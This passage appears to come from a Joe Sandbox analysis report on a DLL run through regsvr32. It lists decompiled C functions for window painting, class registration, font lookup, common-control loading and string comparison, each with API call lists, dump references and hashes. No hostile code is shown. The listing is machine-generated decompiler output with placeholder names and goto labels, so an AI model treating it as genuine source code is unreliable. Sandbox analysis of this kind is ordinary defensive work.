                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                        • String ID: Marlett
                                                                        • API String ID: 1397664628-3688754224
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002F6AD(void* __ecx, int _a4) {
                                                                        				int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				long _t39;
                                                                        				int _t42;
                                                                        				int _t43;
                                                                        				int _t62;
                                                                        				int _t66;
                                                                        				void* _t68;
                                                                        				long _t69;
                                                                        				int _t71;
                                                                        
                                                                        				_t69 = _a4;
                                                                        				_t68 = __ecx;
                                                                        				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t69);
                                                                        				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
                                                                        					GetWindowRect( *(_t68 + 0x1c),  &_v24);
                                                                        					_t42 = _a4;
                                                                        					_t66 =  *(_t42 + 0x10);
                                                                        					_t71 = _v24.right - _v24.left;
                                                                        					_t62 = _v24.bottom - _v24.top;
                                                                        					_t43 =  *(_t42 + 0x14);
                                                                        					_v8 = _t66;
                                                                        					_a4 = _t43;
                                                                        					if(_t66 != _t71 && ( *(_t68 + 0x7d) & 0x00000004) != 0) {
                                                                        						SetRect( &_v24, _t66 -  *0x1004efa0, 0, _t66, _t43);
                                                                        						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                        						SetRect( &_v24, _t71 -  *0x1004efa0, 0, _t71, _a4);
                                                                        						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                        						_t66 = _v8;
                                                                        						_t43 = _a4;
                                                                        					}
                                                                        					if(_t43 != _t62 && ( *(_t68 + 0x7d) & 0x00000008) != 0) {
                                                                        						SetRect( &_v24, 0, _t43 -  *0x1004efa4, _t66, _t43);
                                                                        						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                        						SetRect( &_v24, 0, _t62 -  *0x1004efa4, _v8, _t62);
                                                                        						_t43 = InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                        					}
                                                                        					return _t43;
                                                                        				}
                                                                        				return _t39;
                                                                        			}














                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002F6C2
                                                                        • GetWindowRect.USER32 ref: 1002F6DA
                                                                        • SetRect.USER32 ref: 1002F714
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F723
                                                                        • SetRect.USER32 ref: 1002F73A
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F749
                                                                        • SetRect.USER32 ref: 1002F774
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F77F
                                                                        • SetRect.USER32 ref: 1002F796
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F7A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Invalidate$Window$Proc
                                                                        • String ID:
                                                                        • API String ID: 570070710-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10020B9B() {
                                                                        				signed int _t39;
                                                                        				CHAR* _t43;
                                                                        				int _t44;
                                                                        				WNDCLASSA* _t63;
                                                                        				void* _t71;
                                                                        				void* _t73;
                                                                        
                                                                        				E10011BF0(0x1003a552, _t71);
                                                                        				_t63 =  *(_t71 + 8);
                                                                        				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
                                                                        				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
                                                                        					if(RegisterClassA(_t63) == 0) {
                                                                        						L5:
                                                                        						_t39 = 0;
                                                                        					} else {
                                                                        						 *(_t71 - 0x18) = 1;
                                                                        						if( *((char*)(E100373B5() + 0x14)) == 0) {
                                                                        							L10:
                                                                        							_t39 =  *(_t71 - 0x18);
                                                                        						} else {
                                                                        							E10037A1B(1);
                                                                        							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                        							_t43 = E100373B5() + 0x34;
                                                                        							 *(_t71 - 0x14) = _t43;
                                                                        							_t44 = lstrlenA(_t43);
                                                                        							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
                                                                        							if(_t44 + _t13 < 0x1000) {
                                                                        								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
                                                                        								if( *(_t71 + 8) + lstrlenA(_t63->lpszClassName) + 2 >= 0x1000) {
                                                                        									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
                                                                        									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
                                                                        								} else {
                                                                        									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
                                                                        									 *(_t71 + 0xa) = 0xa;
                                                                        									 *((char*)(_t71 + 0xb)) = 0;
                                                                        									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
                                                                        								}
                                                                        								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                                        								E10037A7E(1);
                                                                        								goto L10;
                                                                        							} else {
                                                                        								goto L5;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t39 = 1;
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
                                                                        				return _t39;
                                                                        			}










                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Classlstrlen$H_prologInfoRegister
                                                                        • String ID:
                                                                        • API String ID: 3690589370-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E10023123(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                                                                        				struct HWND__* _v8;
                                                                        				void* __ebp;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        				void* _t15;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        				void* _t29;
                                                                        				struct HWND__* _t30;
                                                                        				signed int _t34;
                                                                        				void* _t37;
                                                                        				void* _t41;
                                                                        				void* _t44;
                                                                        
                                                                        				_t29 = __ebx;
                                                                        				_push(__ecx);
                                                                        				_t37 = __ecx;
                                                                        				_t12 = E10023092(__ecx);
                                                                        				_t34 = _a4 & 0x0000fff0;
                                                                        				_t41 = _t12;
                                                                        				_t14 = _t34 - 0xf040;
                                                                        				if(_t14 == 0) {
                                                                        					L12:
                                                                        					if(_a8 != 0x75 || _t41 == 0) {
                                                                        						L15:
                                                                        						_t15 = 0;
                                                                        						goto L16;
                                                                        					} else {
                                                                        						E1002040A(_t41);
                                                                        						L11:
                                                                        						_t15 = 1;
                                                                        						L16:
                                                                        						return _t15;
                                                                        					}
                                                                        				}
                                                                        				_t18 = _t14 - 0x10;
                                                                        				if(_t18 == 0) {
                                                                        					goto L12;
                                                                        				}
                                                                        				_t19 = _t18 - 0x10;
                                                                        				if(_t19 == 0 || _t19 == 0xa0) {
                                                                        					if(_t34 == 0xf060 || _a8 != 0) {
                                                                        						if(_t41 != 0) {
                                                                        							_push(_t29);
                                                                        							_t30 =  *(_t37 + 0x1c);
                                                                        							_v8 = GetFocus();
                                                                        							E100220EE(_t44, SetActiveWindow( *(_t41 + 0x1c)));
                                                                        							SendMessageA( *(_t41 + 0x1c), 0x112, _a4, _a8);
                                                                        							if(IsWindow(_t30) != 0) {
                                                                        								SetActiveWindow(_t30);
                                                                        							}
                                                                        							if(IsWindow(_v8) != 0) {
                                                                        								SetFocus(_v8);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L11;
                                                                        				} else {
                                                                        					goto L15;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ActiveFocus$MessageSend
                                                                        • String ID: u
                                                                        • API String ID: 1556911595-4067256894
                                                                        • Opcode ID: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                        • Instruction ID: 4dd9d1b88c5e5c3b3a68c724072b9ea331201f72bd5375ef8a8f6a79988825c8
                                                                        • Opcode Fuzzy Hash: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                        • Instruction Fuzzy Hash: 53113832A0021DBFDB21DF75EC4595E7BA4EF41390B80C822ED02D61A6DA34ED60CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10024970(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v40;
                                                                        				void _v68;
                                                                        				intOrPtr _v72;
                                                                        				intOrPtr _t14;
                                                                        				void* _t15;
                                                                        				int _t24;
                                                                        				char* _t30;
                                                                        				struct HDC__* _t32;
                                                                        
                                                                        				_t14 =  *0x1004c470; // 0x303bb91f
                                                                        				_t32 = GetStockObject;
                                                                        				_t24 = 0xa;
                                                                        				_v8 = _t14;
                                                                        				_v72 = __ecx;
                                                                        				_t30 = "System";
                                                                        				_t15 = GetStockObject(0x11);
                                                                        				if(_t15 != 0) {
                                                                        					L2:
                                                                        					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
                                                                        						_t30 =  &_v40;
                                                                        						_t32 = GetDC(0);
                                                                        						if(_v68 < 0) {
                                                                        							_v68 =  ~_v68;
                                                                        						}
                                                                        						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
                                                                        						ReleaseDC(0, _t32);
                                                                        					}
                                                                        					L6:
                                                                        					if(_a4 == 0) {
                                                                        						_a4 = _t24;
                                                                        					}
                                                                        					return E100117AE(E10024838(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
                                                                        				}
                                                                        				_t15 = GetStockObject(0xd);
                                                                        				if(_t15 == 0) {
                                                                        					goto L6;
                                                                        				}
                                                                        				goto L2;
                                                                        			}













                                                                        APIs
                                                                        • GetStockObject.GDI32(00000011), ref: 10024994
                                                                        • GetStockObject.GDI32(0000000D), ref: 1002499C
                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 100249A9
                                                                        • GetDC.USER32(00000000), ref: 100249B8
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 100249CC
                                                                        • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100249D8
                                                                        • ReleaseDC.USER32 ref: 100249E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Stock$CapsDeviceRelease
                                                                        • String ID: System
                                                                        • API String ID: 46613423-3470857405
                                                                        • Opcode ID: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                        • Instruction ID: 93baf42c8ba0638d3e86fd25d7fd089804823e0dcc4687e6d17ef0450da081f3
                                                                        • Opcode Fuzzy Hash: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                        • Instruction Fuzzy Hash: F5114F31A40228EFEB01DBA1DD85FAE7BB8FB45785F410019F605EA191DBB49D42CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 40%
                                                                        			E1002155E(signed int _a4, signed int _a8) {
                                                                        				struct HINSTANCE__* _t6;
                                                                        				_Unknown_base(*)()* _t7;
                                                                        				struct HINSTANCE__* _t13;
                                                                        				struct HINSTANCE__* _t14;
                                                                        				CHAR* _t16;
                                                                        				signed int _t17;
                                                                        
                                                                        				_t16 = "COMCTL32.DLL";
                                                                        				_t14 = GetModuleHandleA(_t16);
                                                                        				_t6 = LoadLibraryA(_t16);
                                                                        				_t13 = _t6;
                                                                        				if(_t13 == 0) {
                                                                        					return _t6;
                                                                        				} else {
                                                                        					_t17 = 0;
                                                                        					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
                                                                        					if(_t7 != 0) {
                                                                        						_push(_a4);
                                                                        						if( *_t7() != 0) {
                                                                        							_t17 = _a4;
                                                                        							if(_t14 == 0) {
                                                                        								__imp__#17();
                                                                        								_t17 = _t17 | 0x00003fc0;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if((_a8 & 0x00003fc0) == _a8) {
                                                                        							__imp__#17();
                                                                        							_t17 = 0x3fc0;
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t13);
                                                                        					return _t17;
                                                                        				}
                                                                        			}










                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,10021FE1,?,00040000), ref: 10021567
                                                                        • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10021570
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10021584
                                                                        • #17.COMCTL32 ref: 1002159F
                                                                        • #17.COMCTL32 ref: 100215BB
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 100215C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                        • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                        • API String ID: 1437655972-4218389149
                                                                        • Opcode ID: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                        • Instruction ID: b13861e3b3a9cf7542cab635660fc4a1c16e305f76032743bd7b4f367fd9abdc
                                                                        • Opcode Fuzzy Hash: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                        • Instruction Fuzzy Hash: BDF0317A604A76DFE2029FA6AC8894FB6ECEFD1291B024566F901E7251CB24DC0187A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E1001C425(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _t94;
                                                                        				int _t95;
                                                                        				int _t98;
                                                                        				short* _t106;
                                                                        				int _t109;
                                                                        				short* _t111;
                                                                        				short* _t118;
                                                                        				short* _t119;
                                                                        				short* _t126;
                                                                        				char* _t132;
                                                                        				char* _t133;
                                                                        				long _t139;
                                                                        				int _t141;
                                                                        				int _t142;
                                                                        				int _t143;
                                                                        				int _t144;
                                                                        				char _t154;
                                                                        				char _t156;
                                                                        				short* _t159;
                                                                        				short* _t160;
                                                                        				short* _t162;
                                                                        				int _t165;
                                                                        				void* _t166;
                                                                        				void* _t167;
                                                                        				short* _t168;
                                                                        				void* _t173;
                                                                        
                                                                        				_push(0x40);
                                                                        				_push(0x10042fa0);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t94 =  *0x1004c470; // 0x303bb91f
                                                                        				 *((intOrPtr*)(_t167 - 0x1c)) = _t94;
                                                                        				_t162 = 0;
                                                                        				_t165 = 1;
                                                                        				_t173 =  *0x1004f8b0 - _t162; // 0x0
                                                                        				if(_t173 == 0) {
                                                                        					if(CompareStringW(0, 0, 0x10042704, 1, 0x10042704, 1) == 0) {
                                                                        						_t139 = GetLastError();
                                                                        						__eflags = _t139 - 0x78;
                                                                        						if(_t139 == 0x78) {
                                                                        							 *0x1004f8b0 = 2;
                                                                        						}
                                                                        					} else {
                                                                        						 *0x1004f8b0 = 1;
                                                                        					}
                                                                        				}
                                                                        				if( *(_t167 + 0x14) > _t162) {
                                                                        					 *(_t167 + 0x14) = E1001C409( *(_t167 + 0x10),  *(_t167 + 0x14));
                                                                        				}
                                                                        				_t95 =  *(_t167 + 0x1c);
                                                                        				if(_t95 > _t162) {
                                                                        					_t95 = E1001C409( *(_t167 + 0x18), _t95);
                                                                        					 *(_t167 + 0x1c) = _t95;
                                                                        				}
                                                                        				_t144 =  *0x1004f8b0; // 0x0
                                                                        				_t141 = 2;
                                                                        				if(_t144 == _t141 || _t144 == _t162) {
                                                                        					 *(_t167 - 0x38) = _t162;
                                                                        					__eflags =  *(_t167 + 8) - _t162;
                                                                        					if( *(_t167 + 8) == _t162) {
                                                                        						_t109 =  *0x1004f724; // 0x0
                                                                        						 *(_t167 + 8) = _t109;
                                                                        					}
                                                                        					_t142 =  *(_t167 + 0x20);
                                                                        					__eflags = _t142 - _t162;
                                                                        					if(_t142 == _t162) {
                                                                        						_t142 =  *0x1004f734; // 0x0
                                                                        					}
                                                                        					_t166 = E1001A444(_t142,  *(_t167 + 8));
                                                                        					__eflags = _t166 - 0xffffffff;
                                                                        					if(_t166 != 0xffffffff) {
                                                                        						__eflags = _t166 - _t142;
                                                                        						if(__eflags == 0) {
                                                                        							L67:
                                                                        							_t165 = CompareStringA( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 + 0x10),  *(_t167 + 0x14),  *(_t167 + 0x18),  *(_t167 + 0x1c));
                                                                        							__eflags = _t162;
                                                                        							if(__eflags != 0) {
                                                                        								_push(_t162);
                                                                        								E100107C8(_t142, _t162, _t165, __eflags);
                                                                        								_push( *(_t167 - 0x38));
                                                                        								E100107C8(_t142, _t162, _t165, __eflags);
                                                                        							}
                                                                        							goto L69;
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(_t167 + 0x14);
                                                                        						_push( *(_t167 + 0x10));
                                                                        						_push(_t166);
                                                                        						_push(_t142);
                                                                        						_t162 = E1001A487(_t142, _t162, _t166, __eflags);
                                                                        						__eflags = _t162;
                                                                        						if(__eflags == 0) {
                                                                        							goto L61;
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(_t167 + 0x1c);
                                                                        						_push( *(_t167 + 0x18));
                                                                        						_push(_t166);
                                                                        						_push(_t142);
                                                                        						_t106 = E1001A487(_t142, _t162, _t166, __eflags);
                                                                        						 *(_t167 - 0x38) = _t106;
                                                                        						__eflags = _t106;
                                                                        						if(__eflags != 0) {
                                                                        							 *(_t167 + 0x10) = _t162;
                                                                        							 *(_t167 + 0x18) =  *(_t167 - 0x38);
                                                                        							goto L67;
                                                                        						}
                                                                        						_push(_t162);
                                                                        						E100107C8(_t142, _t162, _t166, __eflags);
                                                                        					}
                                                                        					goto L61;
                                                                        				} else {
                                                                        					if(_t144 != _t165) {
                                                                        						L61:
                                                                        						_t98 = 0;
                                                                        						L70:
                                                                        						return E1001254F(E100117AE(_t98,  *((intOrPtr*)(_t167 - 0x1c))));
                                                                        					}
                                                                        					 *(_t167 - 0x3c) = _t162;
                                                                        					 *(_t167 - 0x44) = _t162;
                                                                        					 *(_t167 - 0x40) = _t162;
                                                                        					if( *(_t167 + 0x20) == _t162) {
                                                                        						_t144 =  *0x1004f734; // 0x0
                                                                        						 *(_t167 + 0x20) = _t144;
                                                                        					}
                                                                        					if( *(_t167 + 0x14) == _t162 || _t95 == _t162) {
                                                                        						if( *(_t167 + 0x14) != _t95) {
                                                                        							__eflags = _t95 - _t165;
                                                                        							if(_t95 > _t165) {
                                                                        								L69:
                                                                        								_t98 = _t165;
                                                                        								goto L70;
                                                                        							}
                                                                        							__eflags =  *(_t167 + 0x14) - _t165;
                                                                        							if( *(_t167 + 0x14) <= _t165) {
                                                                        								_t111 = GetCPInfo( *(_t167 + 0x20), _t167 - 0x30);
                                                                        								__eflags = _t111;
                                                                        								if(_t111 == 0) {
                                                                        									goto L61;
                                                                        								}
                                                                        								__eflags =  *(_t167 + 0x14) - _t162;
                                                                        								if( *(_t167 + 0x14) <= _t162) {
                                                                        									__eflags =  *(_t167 + 0x1c) - _t162;
                                                                        									if( *(_t167 + 0x1c) <= _t162) {
                                                                        										goto L38;
                                                                        									}
                                                                        									__eflags =  *(_t167 - 0x30) - _t141;
                                                                        									if( *(_t167 - 0x30) < _t141) {
                                                                        										goto L69;
                                                                        									}
                                                                        									_t132 = _t167 - 0x2a;
                                                                        									__eflags =  *((char*)(_t167 - 0x2a));
                                                                        									if( *((char*)(_t167 - 0x2a)) == 0) {
                                                                        										goto L69;
                                                                        									} else {
                                                                        										goto L33;
                                                                        									}
                                                                        									while(1) {
                                                                        										L33:
                                                                        										_t159 =  *((intOrPtr*)(_t132 + 1));
                                                                        										__eflags = _t159;
                                                                        										if(_t159 == 0) {
                                                                        											goto L69;
                                                                        										}
                                                                        										_t154 =  *( *(_t167 + 0x18));
                                                                        										__eflags = _t154 -  *_t132;
                                                                        										if(_t154 <  *_t132) {
                                                                        											L36:
                                                                        											_t132 = _t132 + _t141;
                                                                        											__eflags =  *_t132;
                                                                        											if( *_t132 != 0) {
                                                                        												continue;
                                                                        											}
                                                                        											goto L69;
                                                                        										}
                                                                        										__eflags = _t154 - _t159;
                                                                        										if(_t154 <= _t159) {
                                                                        											goto L17;
                                                                        										}
                                                                        										goto L36;
                                                                        									}
                                                                        									goto L69;
                                                                        								}
                                                                        								__eflags =  *(_t167 - 0x30) - _t141;
                                                                        								if( *(_t167 - 0x30) < _t141) {
                                                                        									goto L20;
                                                                        								}
                                                                        								_t133 = _t167 - 0x2a;
                                                                        								__eflags =  *((char*)(_t167 - 0x2a));
                                                                        								if( *((char*)(_t167 - 0x2a)) == 0) {
                                                                        									goto L20;
                                                                        								} else {
                                                                        									goto L25;
                                                                        								}
                                                                        								while(1) {
                                                                        									L25:
                                                                        									_t160 =  *((intOrPtr*)(_t133 + 1));
                                                                        									__eflags = _t160;
                                                                        									if(_t160 == 0) {
                                                                        										goto L20;
                                                                        									}
                                                                        									_t156 =  *( *(_t167 + 0x10));
                                                                        									__eflags = _t156 -  *_t133;
                                                                        									if(_t156 <  *_t133) {
                                                                        										L28:
                                                                        										_t133 = _t133 + _t141;
                                                                        										__eflags =  *_t133;
                                                                        										if( *_t133 != 0) {
                                                                        											continue;
                                                                        										}
                                                                        										goto L20;
                                                                        									}
                                                                        									__eflags = _t156 - _t160;
                                                                        									if(_t156 <= _t160) {
                                                                        										goto L17;
                                                                        									}
                                                                        									goto L28;
                                                                        								}
                                                                        							}
                                                                        							L20:
                                                                        							_t98 = 3;
                                                                        							goto L70;
                                                                        						}
                                                                        						L17:
                                                                        						_t98 = _t141;
                                                                        						goto L70;
                                                                        					} else {
                                                                        						L38:
                                                                        						_t143 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x10),  *(_t167 + 0x14), _t162, _t162);
                                                                        						 *(_t167 - 0x48) = _t143;
                                                                        						__eflags = _t143 - _t162;
                                                                        						if(_t143 == _t162) {
                                                                        							goto L61;
                                                                        						}
                                                                        						 *(_t167 - 4) = _t162;
                                                                        						E10010B20(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
                                                                        						 *(_t167 - 0x18) = _t168;
                                                                        						 *(_t167 - 0x34) = _t168;
                                                                        						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                        						_t118 =  *(_t167 - 0x34);
                                                                        						__eflags = _t118 - _t162;
                                                                        						if(_t118 != _t162) {
                                                                        							L43:
                                                                        							_t119 = MultiByteToWideChar( *(_t167 + 0x20), _t165,  *(_t167 + 0x10),  *(_t167 + 0x14), _t118, _t143);
                                                                        							__eflags = _t119;
                                                                        							if(_t119 == 0) {
                                                                        								L53:
                                                                        								__eflags =  *(_t167 - 0x3c);
                                                                        								if(__eflags != 0) {
                                                                        									_push( *(_t167 - 0x34));
                                                                        									E100107C8(_t143, _t162, _t165, __eflags);
                                                                        								}
                                                                        								_t98 =  *(_t167 - 0x40);
                                                                        								goto L70;
                                                                        							}
                                                                        							_t165 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x18),  *(_t167 + 0x1c), 0, 0);
                                                                        							 *(_t167 - 0x4c) = _t165;
                                                                        							__eflags = _t165;
                                                                        							if(_t165 == 0) {
                                                                        								goto L53;
                                                                        							}
                                                                        							 *(_t167 - 4) = 1;
                                                                        							E10010B20(_t165 + _t165 + 0x00000003 & 0xfffffffc, _t144);
                                                                        							 *(_t167 - 0x18) = _t168;
                                                                        							_t162 = _t168;
                                                                        							 *(_t167 - 0x50) = _t162;
                                                                        							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                        							__eflags = _t162;
                                                                        							if(_t162 != 0) {
                                                                        								L49:
                                                                        								_t126 = MultiByteToWideChar( *(_t167 + 0x20), 1,  *(_t167 + 0x18),  *(_t167 + 0x1c), _t162, _t165);
                                                                        								__eflags = _t126;
                                                                        								if(_t126 != 0) {
                                                                        									 *(_t167 - 0x40) = CompareStringW( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 - 0x34), _t143, _t162, _t165);
                                                                        								}
                                                                        								__eflags =  *(_t167 - 0x44);
                                                                        								if(__eflags != 0) {
                                                                        									_push(_t162);
                                                                        									E100107C8(_t143, _t162, _t165, __eflags);
                                                                        								}
                                                                        								goto L53;
                                                                        							} else {
                                                                        								_t162 = E100107B6(_t165 + _t165);
                                                                        								__eflags = _t162;
                                                                        								if(_t162 == 0) {
                                                                        									goto L53;
                                                                        								}
                                                                        								 *(_t167 - 0x44) = 1;
                                                                        								goto L49;
                                                                        							}
                                                                        						} else {
                                                                        							_t118 = E100107B6(_t143 + _t143);
                                                                        							_pop(_t144);
                                                                        							 *(_t167 - 0x34) = _t118;
                                                                        							__eflags = _t118 - _t162;
                                                                        							if(_t118 == _t162) {
                                                                        								goto L61;
                                                                        							}
                                                                        							 *(_t167 - 0x3c) = _t165;
                                                                        							goto L43;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}





























                                                                        0x1001c756
                                                                        0x1001c757
                                                                        0x1001c75c
                                                                        0x00000000
                                                                        0x1001c4b9
                                                                        0x1001c4bb
                                                                        0x1001c717
                                                                        0x1001c717
